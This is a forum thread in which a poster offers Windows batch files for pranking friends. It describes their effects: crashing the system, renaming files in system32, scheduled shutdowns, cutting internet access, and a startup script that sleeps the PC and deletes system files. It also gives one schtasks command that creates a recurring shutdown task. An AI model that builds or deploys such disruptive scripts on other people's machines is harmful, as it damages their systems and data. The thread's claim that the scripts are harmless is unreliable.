Batch files for trolling!

Guest Prayaas Aggarwal

Guest Prayaas Aggarwal

Troll your friends with the following batch files! Try the ones marked with an asterik. They cause no harm. They only scare noobs! 1) awesome_trick.bat* It will crash Windows XP! 2) best_game.bat It will tell a person to restart his PC and cause a few problems, if you know what I mean. 3) Cool.bat* It will continuously keep on opening web-pages and cause system to crash. Everything is fine after a restart. Save all your work then try this. 4) cool_game.bat* Changes the extension of all files in the folder it is placed, to .HIV. You can manually change those back. Place it in system32 and run it! 5) magic.bat* The BEST ONE! I've scared so many noobs with it! 6) shutdown.bat Shuts down PC every 30 minutes. 7) wow.bat Disables Internet Access! 8) a.bat* Swaps mouse button (left to right) 9) hi.bat* It will tell a noob to reinstall windows.

• 1 month later...
Guest Prayaas Aggarwal

Ok I've done batch coding stuff more or less for fun the shutdown one is not efficient but funny.

Punch this in to make it better:

Schtasks /create /sc HOURLY /TN Shutdown /TR CMD.exe Shutdown /f

Is this too evil?

LOL, yeah!

• 6 months later...
  • 4 weeks later...

What does "Magic" do?

i checked that script.........

when you run that command execute to create a script file of sleep mod for windows...... and most of thing  in that bat file he added that script in  startup folder..... means that script will run on  every startup of computer..... the sleep time is 5 min as i think...... means it will sleep your computer every 5 min ..........

and also it will delete some system files ...........

in other way .......... this bat file make your computer sleep....... everytime means 5 min to 2 min..... not sure about timing..... in scariest way ......

hope you understand......

• 5 months later...
  • 2 months later...